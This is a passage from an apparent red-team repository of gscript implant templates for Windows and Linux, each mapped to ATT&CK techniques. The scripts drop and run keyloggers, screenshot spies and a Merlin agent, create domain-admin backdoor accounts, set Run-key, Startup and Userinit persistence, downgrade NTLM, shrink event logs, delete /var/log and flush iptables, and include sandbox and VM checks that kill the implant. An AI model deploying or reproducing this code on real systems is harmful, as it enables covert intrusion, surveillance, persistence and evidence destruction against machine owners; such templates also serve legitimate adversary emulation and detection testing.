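  var temppath = os.TempDir();
  var naming = G.rand.GetAlphaString(4).toLowerCase();
  var fullpath = temppath+"\\"+naming+".dll";

  // Write the sample
  console.log("file name: "+ fullpath);
  var writeErr = G.file.WriteFileFromBytes(fullpath, spy[0]);
  if (writeErr != null) {
    console.log("errors: "+writeErr);
    return false;
  }

  // rundll32 takes "<dll>,<export>" as a single argument; the export name is
  // case-sensitive and assumed to be "dllmain" as in the original.
  var cmd = fullpath + ",dllmain";
  var running = G.exec.ExecuteCommandAsync("C:\\Windows\\System32\\rundll32.exe", [cmd]);
  if (running[1] != null) {
    console.log("errors: "+running[1]);
    return false;
  }

  console.log("Done Keylog");
  return true;
}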
37 |
--------------------------------------------------------------------------------
/attack/windows/merlin_example.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Merlin Example
3 | // Author: ahhh
4 | // Purpose: Drops merlin as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:150
9 | //timeout:150
10 | //import:/private/tmp/merlinagent.exe
11 | //go_import:os as os2
12 |
// Deploy: writes the bundled merlinagent.exe asset to a randomly named file
// under the OS temp directory and launches it asynchronously.
// Errors from the asset lookup, the write and the launch are only logged;
// the function returns true regardless of whether any step succeeded.
function Deploy() {

console.log("Starting to drop merlin binary");
// Getting our asset
// index 0 is the file content, index 1 is logged as the error
var merlinBin = GetAssetAsBytes("merlinagent.exe");
console.log("errors: "+merlinBin[1]);

// Getting a random string
// NOTE(review): DebugConsole() is invoked before the drop — looks like a
// leftover debugging hook; confirm it is intended in a non-interactive run.
DebugConsole();
var temppath = os2.TempDir();
var naming = G.rand.GetAlphaString(4);
//var naming = "blabla";
naming = naming.toLowerCase();
// NOTE(review): joined with "//" while the sibling Windows scripts use "\\"
var fullpath = temppath+"//"+naming+".exe";
console.log("file name: "+ fullpath);

// assigned without var, so `errors` becomes a global in the script engine
errors = G.file.WriteFileFromBytes(fullpath, merlinBin[0]);
console.log("errors: "+errors);

// launched with a single empty-string argument; index 1 of the result is the error
var running = G.exec.ExecuteCommandAsync(fullpath, [""]);
console.log("errors: "+running[1]);

return true
}
--------------------------------------------------------------------------------
/attack/windows/net_user_creation.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Net User Creation
3 | // Author: ahhh
4 | // Purpose: add a local user, domain user, add them to local administrators and domain administrators groups
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1136
7 |
8 | //priority:100
9 | //timeout:150
10 |
// Script-level binding. It is never assigned or read by the Deploy() in this file.
var fn = undefined;
12 |
// Deploy: runs a fixed sequence of net.exe commands that create a local and a
// domain account named "spoderman" (the password is hard-coded in clear text
// below), add it to local and domain administrator groups, and then delete
// the account again. Every call is ExecuteCommandAsync and its result is
// discarded, so nothing here verifies that a command ran or succeeded, and
// each console.log claims success unconditionally. If the async calls do not
// complete in order, the group additions may run before the account exists —
// TODO confirm ExecuteCommandAsync ordering semantics.
// Always returns true.
function Deploy() {
console.log("starting execution of Net User Creation");
// Add a local user
G.exec.ExecuteCommandAsync("net.exe", ["user", "spoderman", "TheAmazing", "/add", "/fullname:Spoder Man"]);
console.log("Added a local user spoderman");

// Add a domain user
G.exec.ExecuteCommandAsync("net.exe", ["user", "spoderman", "TheAmazing", "/add", "/fullname:Spoder Man", "/domain"]);
console.log("Added a domain user spoderman");

// Add the user to the Administrators group
G.exec.ExecuteCommandAsync("net.exe", ["group", "Administrators", "spoderman", "/add"]);
console.log("Added spoderman to the Administrators group");

// Add the user to the Domain Admins group
G.exec.ExecuteCommandAsync("net.exe", ["group", "Domain Admins", "spoderman", "/add", "/domain"]);
console.log("Added spoderman to the Domain Administrators group");

// Add the user to the local Administrators group (localgroup, no /domain)
G.exec.ExecuteCommandAsync("net.exe", ["localgroup", "Administrators", "spoderman", "/add"]);
console.log("Added spoderman to the local Administrators group");

// Remove the local user spoderman
G.exec.ExecuteCommandAsync("net.exe", ["user", "spoderman", "/delete"]);
console.log("Removed the local user spoderman");

// Remove the domain user spoderman
// (the log text below says "local" although this command carries /domain)
G.exec.ExecuteCommandAsync("net.exe", ["user", "spoderman", "/delete", "/domain"]);
console.log("Removed the local user spoderman");

console.log("done Net User Creation");

return true;
}
47 |
--------------------------------------------------------------------------------
/attack/windows/netntlm_downgrade.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: NetNTLM Downgrade
3 | // Author: ahhh
4 | // Purpose: Force LM and NT hashes during SMB auth
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Notes: Works in conjunction with SMB relaying https://attack.mitre.org/wiki/Technique/T1187
8 |
9 | //priority:97
10 | //timeout:150
11 |
12 | //go_import:github.com/gen0cide/gscript/x/windows as windows
13 |
// Deploy: writes DWORD 0 to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\lmcompatibilitylevel
// (per the file header, intended to force LM/NT hash use during SMB auth).
// The return value of AddRegKeyDWORD is discarded, so a failed write (e.g. when
// the process lacks rights to HKLM) is not reported; the function always
// returns true.
function Deploy() {
console.log("Starting NetNTLM Downgrade");

var value = 0;
windows.AddRegKeyDWORD("LOCAL_MACHINE", "SYSTEM\\CurrentControlSet\\Control\\Lsa", "lmcompatibilitylevel", value);

console.log("Done NetNTLM Downgrade");
return true;
}
23 |
--------------------------------------------------------------------------------
/attack/windows/runkey_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: CurrentVersion Run Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a CurrentVersion\Run regkey
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1112
7 |
8 | //priority:90
9 | //timeout:150
10 |
11 | //go_import:os as os
12 | //go_import:github.com/gen0cide/gscript/x/windows as windows
13 |
14 | //import:/private/tmp/example.exe
15 |
// Deploy: writes the bundled example.exe asset to a randomly named file under
// the OS temp directory and registers that path as the "ExampleExe" value of
// HKCU\Software\Microsoft\Windows\CurrentVersion\Run. The sample is not
// executed here (the launch lines are commented out). Write errors are only
// logged and the registry call's result is discarded; always returns true.
function Deploy() {
console.log("starting execution of Run Key Persistence");
// Prep the sample
// index 0 of the asset pair is the file content
var example = GetAssetAsBytes("example.exe");
var temppath = os.TempDir();
var naming = G.rand.GetAlphaString(5);
naming = naming.toLowerCase();
var fullpath = temppath+"\\"+naming+".exe";

// Drop the sample
console.log("file name: "+ fullpath);
// assigned without var, so `errors` becomes a global in the script engine
errors = G.file.WriteFileFromBytes(fullpath, example[0]);
console.log("errors: "+errors);

// Persist the sample
windows.AddRegKeyString("CURRENT_USER", "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "ExampleExe", fullpath);
console.log("Adding a reg key for current user run");

// Execute the sample
// (left disabled; note the quoted "fullpath" literal would not expand the variable)
//var running = G.exec.ExecuteCommandAsync("fullpath", [""]);
//console.log("executed the example binary, errors: " + Dump(running[1]));
console.log("done, deployed binary with run key persistence");
return true;
}
40 |
--------------------------------------------------------------------------------
/attack/windows/salt_install.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Salt Minion Example
3 | // Author: ahhh
4 | // Purpose: Drops Salt Minion installer as an asset and executes it async
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 | // Includes:
8 |
9 | //priority:150
10 | //timeout:150
11 |
12 | //import:bootstrap-salt.ps1
13 |
14 | //go_import:os as os
15 |
// Deploy: writes the bundled bootstrap-salt.ps1 asset to the fixed path
// C:\salt.ps1 and runs it through powershell with the local hostname as the
// minion id and an empty -master value. Errors from each step are only
// Dump()-logged; the function returns true regardless.
function Deploy() {
console.log("Starting to drop salt installer");
// Getting our asset
// index 0 is the file content, index 1 is logged as the error
var saltBin = GetAssetAsBytes("bootstrap-salt.ps1");
console.log("errors: "+Dump(saltBin[1]));

// Write our salt installer file
// assigned without var, so `fullpath` becomes a global in the script engine;
// a fixed path, unlike the random temp-dir names used by the sibling scripts
fullpath = "C:\\salt.ps1";
console.log("file name: "+ fullpath);
errors = G.file.WriteFileFromBytes(fullpath, saltBin[0]);
console.log("errors: "+Dump(errors));

// Get Hostname
// os.Hostname() is treated as a pair; index 0 is the name
var obj = os.Hostname();

// Run install
// ExecuteCommand rather than ExecuteCommandAsync — presumably blocks until
// powershell exits (TODO confirm). -master is an empty string here, which
// looks like a placeholder to be filled in.
var running = G.exec.ExecuteCommand("powershell", [fullpath, "-minion", obj[0], "-master", ""]);
console.log("errors: "+Dump(running[1]));

return true
}
37 |
--------------------------------------------------------------------------------
/attack/windows/screenshot_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Screenshot Spy
3 | // Author: ahhh
4 | // Purpose: Takes screenshots of the desktop every half hour for the next 24 hours (48 x 1800)
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1113
7 | // Using GoRedSpy to take screenshots: https://github.com/ahhh/GoRedSpy
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/GoRedSpy.exe
12 | //go_import:os as os
13 |
// Deploy: writes the bundled GoRedSpy.exe asset to a randomly named file under
// the OS temp directory and launches it asynchronously with -outDir set to that
// same temp directory, -count 48 and -delay 1800s (per the header: one capture
// every half hour for 24 hours). Errors are only logged; always returns true.
function Deploy() {
console.log("Starting GoRedSpy");

// Prep the sample
// index 0 of the asset pair is the file content
var spy = GetAssetAsBytes("GoRedSpy.exe");
var temppath = os.TempDir();
var naming = G.rand.GetAlphaString(5);
naming = naming.toLowerCase();
var fullpath = temppath+"\\"+naming+".exe";

// Drop the sample
console.log("file name: "+ fullpath);
// assigned without var, so `errors` becomes a global in the script engine
errors = G.file.WriteFileFromBytes(fullpath, spy[0]);
console.log("errors: "+errors);

// Run the sample
// the output directory is the temp directory itself, so captures land next to the binary
var running = G.exec.ExecuteCommandAsync(fullpath, ["-outDir", temppath, "-count", "48", "-delay", "1800s"]);
console.log("errors running: "+running[1]);

console.log("Done GoRedSpy");
return true;
}
36 |
--------------------------------------------------------------------------------
/attack/windows/shrink_logsize.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Shrink Logsize
3 | // Author: ahhh
4 | // Purpose: This will shrink the max logsize of the windows event logs to a single byte
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:93
9 | //timeout:150
10 |
11 | //go_import:os as os
12 | //go_import:github.com/gen0cide/gscript/x/windows as windows
13 |
// Deploy: writes DWORD 1 as the MaxSize policy value for the Application,
// Security and System event logs under HKLM\Software\Policies\Microsoft\Windows\EventLog.
// The results of the three registry calls are discarded, so a failed write is
// not reported; always returns true. (The `os` go_import in the header is not
// used in this function.)
function Deploy() {
console.log("Starting execution of Shrink Logsize");

// no terminating semicolon — relies on automatic semicolon insertion
var value = 0x00001
// shrink the logs
windows.AddRegKeyDWORD("LOCAL_MACHINE", "Software\\Policies\\Microsoft\\Windows\\EventLog\\Application", "MaxSize", value);
windows.AddRegKeyDWORD("LOCAL_MACHINE", "Software\\Policies\\Microsoft\\Windows\\EventLog\\Security", "MaxSize", value);
windows.AddRegKeyDWORD("LOCAL_MACHINE", "Software\\Policies\\Microsoft\\Windows\\EventLog\\System", "MaxSize", value);

console.log("Done Shrink Logsize");
return true;
}
26 |
--------------------------------------------------------------------------------
/attack/windows/startup_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Startup Persistence
3 | // Author: ahhh
4 | // Purpose: Drop a sample binary and persist it using a script in the Startup folder
5 | // Gscript version: 1.0.0
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1060
7 |
8 | //priority:90
9 | //timeout:150
10 | //import:/private/tmp/example.exe
11 | //go_import:os as os
12 |
// Deploy: writes the bundled example.exe asset to a randomly named file under
// the OS temp directory, then writes a one-line start.bat into the all-users
// Startup folder that invokes powershell with that path appended. The sample
// is not executed here (the launch lines are commented out). Write errors are
// only logged / discarded; always returns true.
function Deploy() {
console.log("starting execution of Startup Persistence");

// Prep the sample
// index 0 of the asset pair is the file content
var example = GetAssetAsBytes("example.exe");
var temppath = os.TempDir();
var naming = G.rand.GetAlphaString(5);
naming = naming.toLowerCase();
var fullpath = temppath+"\\"+naming+".exe";

// Drop the sample
console.log("file name: "+ fullpath);
// assigned without var, so `errors` becomes a global in the script engine
errors = G.file.WriteFileFromBytes(fullpath, example[0]);
console.log("errors: "+errors);

// Persist the sample
// the .bat body is a single powershell command line ending in the dropped path
var cmd = "powershell.exe -NoLogo -WindowStyle hidden -ep bypass " + fullpath;
var fn2 = "C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\start.bat";
// result of the write is not checked
G.file.WriteFileFromString(fn2, cmd);
console.log("persisted the example binary using bat / powershell script in StartUp folder");

// Execute the sample
// (left disabled; note it refers to `fn`, which is not defined in this script — fn2 is)
//var running = G.exec.ExecuteCommandAsync("powershell", ["-NoLogo", "-WindowStyle", "hidden", "-ep", "bypass", fn]);
//console.log("executed the example binary, errors: "+running[1]);

console.log("done, deployed binary with startup persistence");
return true;
}
41 |
--------------------------------------------------------------------------------
/attack/windows/userinit_persistence.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: User Init Persistence
3 | // Author: ahhh
4 | // Purpose: User Init Persistence
5 | // Gscript version: 1.0.0
6 | // ATT&CK:
7 |
8 | //priority:90
9 | //timeout:150
10 |
11 | //go_import:os as os
12 | //go_import:github.com/gen0cide/gscript/x/windows as windows
13 |
14 | //import:/private/tmp/example.exe
15 |
// Deploy: writes the bundled example.exe asset to a randomly named file under
// the OS temp directory and sets the Winlogon "Userinit" string value under
// HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon to that path.
// NOTE(review): the log messages still say "Run Key Persistence" (copied from
// runkey_persistence.gs); this function touches Winlogon, not the Run key.
// If AddRegKeyString overwrites rather than appends, the existing Userinit
// entry is replaced outright — TODO confirm the helper's semantics.
// The sample is not executed here (the launch lines are commented out).
// Errors are only logged / discarded; always returns true.
function Deploy() {
console.log("starting execution of Run Key Persistence");
// Prep the sample
// index 0 of the asset pair is the file content
var example = GetAssetAsBytes("example.exe");
var temppath = os.TempDir();
var naming = G.rand.GetAlphaString(5);
naming = naming.toLowerCase();
var fullpath = temppath+"\\"+naming+".exe";

// Drop the sample
console.log("file name: "+ fullpath);
// assigned without var, so `errors` becomes a global in the script engine
errors = G.file.WriteFileFromBytes(fullpath, example[0]);
console.log("errors: "+errors);

// Persist the sample
windows.AddRegKeyString("LOCAL_MACHINE", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "Userinit", fullpath);
console.log("Adding a reg key for current user run");

// Execute the sample
// (left disabled; note the quoted "fullpath" literal would not expand the variable)
//var running = G.exec.ExecuteCommandAsync("fullpath", [""]);
//console.log("executed the example binary, errors: " + Dump(running[1]));
console.log("done, deployed binary with run key persistence");
return true;
}
40 |
--------------------------------------------------------------------------------
/beta/anti-re/sandbox_cpu1.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_CPU_1
3 | // Author: ahhh
4 | // Purpose: Gets the computer's CPU count, if the machine only has one cpu we consider it a sandbox
5 | // Gscript version: 0.1.2
6 | //
7 |
8 | //priority:50
9 | //timeout:75
10 |
// BeforeDeploy: gate on the CPU-count check. When the helper reports a
// sandbox (a single CPU), the implant logs, calls KillSelf() and the hook
// returns false; otherwise it returns true and deployment continues.
function BeforeDeploy() {
  LogInfo("Testing Sandbox CPUs!");
  var check = CheckIfCPUCountIsHigherThanOne();
  if (!check.areWeInASandbox) {
    return true;
  }
  LogInfo("Detected a single CPU, likly a sandbox!");
  KillSelf();
  return false;
}
23 |
// Deploy: no-op — this script does its work in BeforeDeploy; always succeeds.
function Deploy() {
  var ok = true;
  return ok;
}
27 |
// AfterDeploy: final hook; logs completion and reports success.
function AfterDeploy() {
  var done = true;
  LogInfo("Done Testing Sandbox CPUs!");
  return done;
}
--------------------------------------------------------------------------------
/beta/anti-re/sandbox_hostname.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_Hostname
3 | // Author: ahhh
4 | // Purpose: Gets the computer's hostname, converts it to upper case, then checks it against a list of well-known sandbox hostnames
5 | // Gscript version: 0.1.2
6 | //
7 |
8 | //priority:30
9 | //timeout:75
10 |
// BeforeDeploy: upper-cases the host name and compares it against a fixed list
// of names associated with analysis sandboxes. On a match the implant logs,
// calls KillSelf() and the hook returns false; otherwise it returns true.
function BeforeDeploy() {
  LogInfo("Testing Sandbox Hostname!");
  var info = GetHost();
  var host = (info.hostname).toUpperCase();
  LogInfo("Our hostname is: "+ host);
  var knownSandboxHosts = ["TEQUILABOOMBOOM", "SANDBOX", "VIRUS", "MALWARE", "MALTEST", "PC", "PSPUBWS-PC"];
  if (knownSandboxHosts.indexOf(host) !== -1) {
    LogInfo("Sandbox detected, exiting");
    KillSelf();
    return false;
  }
  return true;
}
24 |
// Deploy: no-op — this script does its work in BeforeDeploy; always succeeds.
function Deploy() {
  var ok = true;
  return ok;
}
28 |
// AfterDeploy: final hook; logs completion and reports success.
function AfterDeploy() {
  var done = true;
  LogInfo("Done Testing Hostname!");
  return done;
}
--------------------------------------------------------------------------------
/beta/anti-re/sandbox_ram1.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_RAM
3 | // Author: ahhh
4 | // Purpose: Gets the computer's allocated RAM; if the machine has 1GB or less we treat it as a sandbox
5 | // Gscript version: 0.1.2
6 | //
7 |
8 | //priority:50
9 | //timeout:100
10 |
// BeforeDeploy: gate on the RAM check. When the helper reports a sandbox
// (1GB or less per the header), the implant logs, calls KillSelf() and the
// hook returns false; otherwise it returns true.
// The log text below still says "single CPU" — it was copied from the CPU check.
function BeforeDeploy() {
  LogInfo("Testing Sandbox RAM!");
  var check = CheckIfRAMAmountIsBelow1GB();
  if (!check.areWeInASandbox) {
    return true;
  }
  LogInfo("Detected a single CPU, likly a sandbox!");
  KillSelf();
  return false;
}
23 |
// Deploy: no-op — this script does its work in BeforeDeploy; always succeeds.
function Deploy() {
  var ok = true;
  return ok;
}
27 |
// AfterDeploy: final hook; logs completion and reports success.
function AfterDeploy() {
  var done = true;
  LogInfo("Done Testing Sandbox RAM!");
  return done;
}
--------------------------------------------------------------------------------
/beta/anti-re/sandbox_users.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_Users
3 | // Author: ahhh
4 | // Purpose: Gets the computer's Users, checks against a list of well known sandbox users
5 | // Gscript version: 0.1.2
6 | //
7 |
8 | //priority:50
9 | //timeout:80
10 |
// BeforeDeploy: gate on the runtime's sandbox-username check. When it reports
// a sandbox, the implant logs, calls KillSelf() and the hook returns false;
// otherwise it returns true.
function BeforeDeploy() {
  LogInfo("Testing Sandbox Users!");
  var check = CheckSandboxUsernames();
  if (!check.areWeInASandbox) {
    return true;
  }
  LogInfo("Detected Common Sandbox Users!");
  KillSelf();
  return false;
}
23 |
// Deploy: no-op — this script does its work in BeforeDeploy; always succeeds.
function Deploy() {
  var ok = true;
  return ok;
}
27 |
// AfterDeploy: final hook; logs completion and reports success.
function AfterDeploy() {
  var done = true;
  LogInfo("Done Testing Users!");
  return done;
}
--------------------------------------------------------------------------------
/beta/anti-re/sandbox_users2.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Sandbox_Users2
3 | // Author: ahhh
4 | // Purpose: Gets the computer's Users, checks against a dynamic list of well known sandbox users
5 | // Gscript version: 0.1.2
6 | //
7 |
8 | //priority:30
9 | //timeout:75
10 |
// BeforeDeploy: upper-cases the current user name and compares it against a
// fixed list of names associated with analysis sandboxes. On a match the
// implant logs, calls KillSelf() and the hook returns false; otherwise true.
function BeforeDeploy() {
  LogInfo("Testing Sandbox Users 2!");
  var info = Getuser();
  var user = (info.username).toUpperCase();
  LogInfo(user);
  var knownSandboxUsers = ["MALTEST", "TEQUILABOOMBOOM", "WILBER", "PSPUBWS"];
  if (knownSandboxUsers.indexOf(user) !== -1) {
    LogInfo("Sandbox detected, exiting");
    KillSelf();
    return false;
  }
  return true;
}
24 |
// Deploy: no-op — this script does its work in BeforeDeploy; always succeeds.
function Deploy() {
  var ok = true;
  return ok;
}
28 |
// AfterDeploy: final hook; logs completion and reports success.
function AfterDeploy() {
  var done = true;
  LogInfo("Done Testing Users 2!");
  return done;
}
--------------------------------------------------------------------------------
/beta/anti-re/windows/vm_regkeys.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Virtual Machine Registry Keys
3 | // Author: ahhh
4 | // Purpose: Looks to see if registry keys exist that indicate the current host is a virtual machine
5 | // Gscript version: 0.1.2
6 | //
7 |
8 | //priority:10
9 | //timeout:100
10 |
// BeforeDeploy: queries a handful of registry values whose contents are taken
// as evidence that the host is a VMware / VirtualBox / QEMU / Bochs virtual
// machine. On a match the implant logs, calls KillSelf() and returns false;
// otherwise it returns true and deployment continues.
// NOTE(review): the lookups read the QueryRegKey result inconsistently — some
// compare .keyValue, others .keyObj.StringVal — confirm which field the
// helper populates; a comparison against the wrong field never matches.
function BeforeDeploy() {
LogInfo("Testing for virtual machine regkeys!");
// VMware Tools user process registered under the machine-wide Run key
var VMWare_val = QueryRegKey("LOCAL_MACHINE", "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "VMWare User Process");
if (VMWare_val.keyValue == "\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr" ){
LogInfo("VMware Tools detected, exiting");
KillSelf();
return false;
}
// VMware Tools registry-backup marker for the current user
var VMWare_val2 = QueryRegKey("CURRENT_USER", "Software\\VMware, Inc.\\VMware Tools\\RegistryBackup\\DisplayScaling_DPI", "backupType");
if (VMWare_val2.keyValue == "created" ){
LogInfo("VMware Tools detected, exiting");
KillSelf();
return false;
}
// BIOS-reported system manufacturer (read via .keyValue)
var system_manu_val = QueryRegKey("LOCAL_MACHINE", "Hardware\\Description\\System\\BIOS", "SystemManufacturer");
if (system_manu_val.keyValue == "VMware, Inc." ){
LogInfo("VMware detected, exiting");
KillSelf();
return false;
}
// BIOS-reported product name (read via .keyObj.StringVal, unlike the checks above)
var system_product_val = QueryRegKey("LOCAL_MACHINE", "Hardware\\Description\\System\\BIOS", "SystemProductName");
if (system_product_val.keyObj.StringVal == "VMware Virtual Platform" ){
LogInfo("VMware detected, exiting");
KillSelf();
return false;
}
// video BIOS version string
var vbox_val = QueryRegKey("LOCAL_MACHINE", "Hardware\\Description\\System", "VideoBiosVersion");
if (vbox_val.keyObj.StringVal == "VIRTUALBOX" ){
LogInfo("VirtualBox detected, exiting");
KillSelf();
return false;
}
// system BIOS version string
// NOTE(review): only the first comparison inspects keyObj.StringVal; the "QEMU"
// and "BOCHS" comparisons are against the returned object itself, and the log
// text names VirtualBox for all three.
var key_val = QueryRegKey("LOCAL_MACHINE", "Hardware\\Description\\System", "SystemBiosVersion");
if (key_val.keyObj.StringVal == "VBOX" || key_val == "QEMU" || key_val == "BOCHS" ){
LogInfo("VirtualBox detected, exiting");
KillSelf();
return false;
}
return true;
}
51 |
// Deploy: no-op — this script does its work in BeforeDeploy; always succeeds.
function Deploy() {
  var ok = true;
  return ok;
}
55 |
// AfterDeploy: final hook; logs completion and reports success.
function AfterDeploy() {
  var done = true;
  LogInfo("Done Testing vm regkeys!");
  return done;
}
--------------------------------------------------------------------------------
/beta/attack/README.md:
--------------------------------------------------------------------------------
1 | **ATT&CK techniques implemented in gscripts**
2 |
3 | [ATT&CK Technique Matrix](https://attack.mitre.org/wiki/Technique_Matrix)
4 |
5 | [gscript examples with ATT&CK](http://lockboxx.blogspot.com/2018/05/gscript-examples-with-att.html)
6 |
--------------------------------------------------------------------------------
/beta/attack/linux/delete_logs.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Delete Logs
3 | // Author: ahhh
4 | // Purpose: Deletes a number of critical security logs on a linux machine, to see if this is detected by the lack of logs or deletion
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1146
7 | // Note: must run implant as root
8 |
9 | //priority:150
10 | //timeout:150
11 |
// BeforeDeploy: requires the implant to run as root. Any other user is
// logged, Halt() is called and the hook returns false; root returns true.
function BeforeDeploy() {
  LogInfo("starting execution of Delete Logs");
  var current = GetUser();
  LogInfo("Our user is: "+current.username);
  if (current.username != "root") {
    LogInfo("Detected a non-root user, this needs to run as root!");
    Halt();
    return false;
  }
  return true;
}
25 |
// Deploy: forks `rm -rf` over the utmp/wtmp/btmp files and the whole
// /var/log/ directory (the directory itself, not just its contents), then
// forks `history -c`. Neither ForkExecuteCommand result is inspected, so the
// LogInfo lines claim success regardless of outcome; always returns true.
function Deploy() {
//rm -rf /var/run/utmp /var/run/wtmp /var/run/btmp /var/log/
ForkExecuteCommand("rm", ["-rf", "/var/run/utmp", "/var/run/wtmp", "/var/run/btmp", "/var/log/"]);
LogInfo("Removed /var/run/utmp, /var/run/wtmp, /var/run/btmp, and all of /var/log/");
// NOTE(review): `history` is a shell builtin rather than a standalone binary;
// whether forking it as a command has any effect depends on how
// ForkExecuteCommand resolves the name — confirm.
ForkExecuteCommand("history", ["-c"]);
LogInfo("Cleared the bash history");
return true;
}
34 |
// AfterDeploy: final hook; logs completion and reports success.
function AfterDeploy() {
  var done = true;
  LogInfo("done Delete Logs");
  return done;
}
--------------------------------------------------------------------------------
/beta/attack/linux/disable_linux_firewall.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Disable Linux Firewall
3 | // Author: ahhh
4 | // Purpose: Drops the linux firewall by dropping all of the iptables rules
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1089
7 |
8 | //priority:150
9 | //timeout:150
10 |
// BeforeDeploy: logs the start marker; no preconditions are checked.
function BeforeDeploy() {
  var proceed = true;
  LogInfo("Starting Disable Linux Firewall");
  return proceed;
}
15 |
// Deploy: lists the current iptables rules (stdout logged), then runs
// `iptables --flush` and logs its stdout. No table is named, so only the
// default table is affected, and the exit status of either command is not
// checked; always returns true.
function Deploy() {
var response = ExecuteCommand("iptables", ["-L"]);
LogInfo(response.retObject.Stdout);

var response2 = ExecuteCommand("iptables", ["--flush"]);
LogInfo(response2.retObject.Stdout);
return true;
}
24 |
// AfterDeploy: final hook; logs completion and reports success.
function AfterDeploy() {
  var done = true;
  LogInfo("Done Disable Linux Firewall");
  return done;
}
--------------------------------------------------------------------------------
/beta/attack/linux/keylog_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Keylog Spy
3 | // Author: ahhh
4 | // Purpose: Starts recording keylogs, saves them in /var/log/skeylogger
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1056
7 | // Using this keylogger: https://github.com/gsingh93/simple-key-logger
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/keylogger.elf
12 |
13 |
// BeforeDeploy: requires the implant to run as root. Any other user is
// logged, Halt() is called and the hook returns false; root returns true.
function BeforeDeploy() {
  LogInfo("Starting keylogger spy");
  var current = GetUser();
  LogInfo("Our user is: "+current.username);
  if (current.username != "root") {
    LogInfo("Detected a non-root user, this needs to run as root!");
    Halt();
    return false;
  }
  return true;
}
27 |
// Deploy: writes the bundled keylogger.elf asset to /tmp/<6 random
// alphanumerics> with mode 0755 and forks it with a single empty-string
// argument. Neither the write nor the fork result is checked; always
// returns true.
function Deploy() {
// Drop the sample
var spy = Asset("keylogger.elf");
var name = "";
var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
// Math.random() is a non-cryptographic generator; it is only used for a file name here
for (var i = 0; i < 6; i++)
name += possible.charAt(Math.floor(Math.random() * possible.length));
name = "/tmp/"+name;
// 0755 is a legacy octal literal (ES5 non-strict); invalid under strict mode
WriteFile(name, spy.fileData, 0755);
LogInfo("dropped the spy binary here: "+name);

ForkExecuteCommand(name, [""]);
return true;
}
42 |
// AfterDeploy: final hook; logs completion and reports success.
function AfterDeploy() {
  var done = true;
  LogInfo("Done keylogger spy");
  return done;
}
47 |
--------------------------------------------------------------------------------
/beta/attack/linux/screenshot_spy.gs:
--------------------------------------------------------------------------------
1 | // Example gscript template
2 | // Title: Screenshot Spy
3 | // Author: ahhh
4 | // Purpose: Takes screenshots of the desktop every half hour for the next 24 hours (48 x 1800)
5 | // Gscript version: 0.1.2
6 | // ATT&CK: https://attack.mitre.org/wiki/Technique/T1113
7 | // Using GoRedSpy to take screenshots: https://github.com/ahhh/GoRedSpy
8 |
9 | //priority:150
10 | //timeout:150
11 | //import:/private/tmp/GoRedSpy.elf
12 |
13 |
// BeforeDeploy: logs the start marker; no preconditions are checked.
function BeforeDeploy() {
  var proceed = true;
  LogInfo("Starting GoRedSpy");
  return proceed;
}
18 |
// Deploy: writes the bundled GoRedSpy.elf asset to /tmp/<5 random
// alphanumerics> with mode 0755 and forks it with -outDir /tmp/, -count 48
// and -delay 1800s (per the header: one capture every half hour for 24
// hours). Neither the write nor the fork result is checked; always returns true.
function Deploy() {
// Drop the sample
var spy = Asset("GoRedSpy.elf");
var name = "";
var possible = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
// Math.random() is a non-cryptographic generator; it is only used for a file name here
for (var i = 0; i < 5; i++)
name += possible.charAt(Math.floor(Math.random() * possible.length));
name = "/tmp/"+name;
// 0755 is a legacy octal literal (ES5 non-strict); invalid under strict mode
WriteFile(name, spy.fileData, 0755);
LogInfo("dropped the spy binary here: "+name);

